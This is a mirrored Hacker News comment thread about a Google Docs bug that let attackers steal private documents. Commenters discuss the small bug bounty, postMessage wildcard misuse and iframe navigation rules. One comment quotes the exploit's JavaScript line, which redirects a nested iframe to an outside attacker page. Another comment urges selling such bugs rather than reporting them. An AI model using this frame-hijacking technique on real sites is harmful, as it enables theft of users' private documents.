TE
科技回声
首页24小时热榜最新最佳问答展示工作
GitHubTwitter
首页

科技回声

基于 Next.js 构建的科技新闻平台,提供全球科技新闻和讨论内容。

GitHubTwitter

首页

首页最新最佳问答展示工作

资源链接

HackerNews API原版 HackerNewsNext.js

© 2025 科技回声. 版权所有。

Stealing private documents through a bug in Google Docs

319 点作者 hackerpain超过 4 年前

10 条评论

jackconsidine超过 4 年前
A few years ago, I built a platform for a client that allowed his customers to show a &quot;Text Me&quot; widget on their websites; the software handled all of the SMS &#x2F; messaging and basically substituted conventional contact form or Intercom integration.<p>His customers used Google AdSense, who started blocking them until they removed the widget. The reason? This widget used an Iframe postMessage, but appropriately specified the singular sandboxed domain. As expected, we never were able to speak with a human at Google- they just sent my clients customers intimidating emails about a security flaw on their websites.<p>Seeing Google abuse the postMessage API with a wildcard argument after this fiasco is maddening! If only they were held to their own arbitrary and vague standards.
评论 #25563162 未加载
xyst超过 4 年前
This was a bug that affected multiple products and even crossed into the enterprise suite and google only rewarded $3.3K USD?<p>It’s almost as bad as Apple’s reward program
评论 #25561597 未加载
评论 #25561471 未加载
评论 #25559580 未加载
评论 #25559467 未加载
评论 #25560967 未加载
评论 #25566581 未加载
评论 #25561489 未加载
评论 #25564563 未加载
评论 #25559381 未加载
twiss超过 4 年前
The most surprising part to me is that this works:<p><pre><code> window.frames[0].frame[0][2].location=&quot;https:&#x2F;&#x2F;geekycat.in&#x2F;exploit.html&quot;; </code></pre> It&#x27;s expected to me that you can change `window.frames[0].location`, since you can also change the &quot;src&quot; attribute of the iframe element. But you can&#x27;t change the &quot;src&quot; attribute of an iframe inside that iframe, if it&#x27;s not same-origin - so why can you change its location?<p>Maybe we should look into whether changing this would break any websites.
评论 #25560130 未加载
评论 #25559506 未加载
评论 #25559470 未加载
diveanon超过 4 年前
To the people publishing these exploits and collecting the trivial bounties.<p>Hats off to you, no idea why you wouldn&#x27;t just sell this off considering how poorly your honesty is rewarded.
评论 #25559841 未加载
评论 #25561643 未加载
评论 #25559647 未加载
评论 #25559634 未加载
评论 #25561872 未加载
评论 #25561371 未加载
评论 #25563157 未加载
评论 #25560399 未加载
评论 #25566549 未加载
评论 #25559835 未加载
评论 #25559629 未加载
评论 #25559981 未加载
评论 #25559677 未加载
mettamage超过 4 年前
Curious question, if you find a few vulnerabilities like this, does it mean that you could get hired by Google to do this internally?<p>What I&#x27;m trying to ask is: does this make the hiring process easier?
评论 #25560482 未加载
评论 #25561973 未加载
评论 #25564698 未加载
评论 #25560118 未加载
random5634超过 4 年前
Good lord, $3K for this?<p>These companies give two craps about security.
paulmendoza超过 4 年前
Google should have awarded a much larger value to this. Like $100k. This is a serious flaw.
评论 #25559655 未加载
评论 #25559245 未加载
评论 #25559238 未加载
评论 #25559197 未加载
评论 #25559304 未加载
konschubert超过 4 年前
Client-side encryption really decreases the attack surfaces of cloud storage solutions.<p>It’s really sad that Keybase failed at building a business around this. Hopefully someone else is going to make another attempt.
评论 #25559610 未加载
评论 #25562607 未加载
评论 #25559750 未加载
评论 #25559439 未加载
评论 #25559329 未加载
Geeky-cat超过 4 年前
Thanks for going through the write-up. As an author of the bug,considering the the impact, user interaction required and other criteria that need to line up to exploit this bug I feel Google VRP&#x27;s decision on this bug is accurate.
BlackPlot超过 4 年前
TBO not surprised at all Gdocs had an issue